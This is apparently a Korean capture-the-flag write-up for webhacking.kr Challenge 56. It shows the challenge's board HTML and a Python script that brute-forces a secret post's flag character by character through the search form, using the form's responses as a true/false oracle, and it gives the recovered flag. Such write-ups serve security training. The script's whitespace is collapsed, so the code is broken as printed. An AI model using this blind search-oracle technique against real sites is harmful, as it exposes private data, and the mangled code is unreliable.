<html>
<head>
<title>Challenge 56</title>
</head>
<body>
<center>
<h2>B O A R D</h2>
<br><br>
<table border=1>
<tr><td>no</td><td>id</td><td>subject</td><td>secret</td></tr>
<tr><td>1</td><td>admin</td><td><a href=?read=admin>readme</a></td><td>1</td></tr>
<tr><td>2</td><td>guest</td><td><a href=?read=guest>hi~</a></td><td>0</td></tr>
</table>
<form method=post>search : <input name=search size=50 maxlength=50><input type=submit></form></body>
</html>
페이지 소스를 참고해 파이썬 코드를 짜면 아래와 같다.
import requestsimport stringURL ='https://webhacking.kr/challenge/web-33/'TRUE_PHRASE ='<td>admin</td>'defquery(payload): data ={'search': payload} r = requests.post(URL, data=data) content = r.textreturn TRUE_PHRASE in content# FLAG{himiko_toga_is_cute_dont_you_think_so?}deffind_flag(): flag ='FLAG{'whilequery(flag +'}')isFalse:for character in string.printable:if character =='%':continueelifquery('{}{}'.format(flag, character))isTrue: flag += characterbreak flag +='}'print('flag: {}'.format(flag))find_flag()
실행 결과, 플래그는 FLAG{himiko_toga_is_cute_dont_you_think_so?}이다.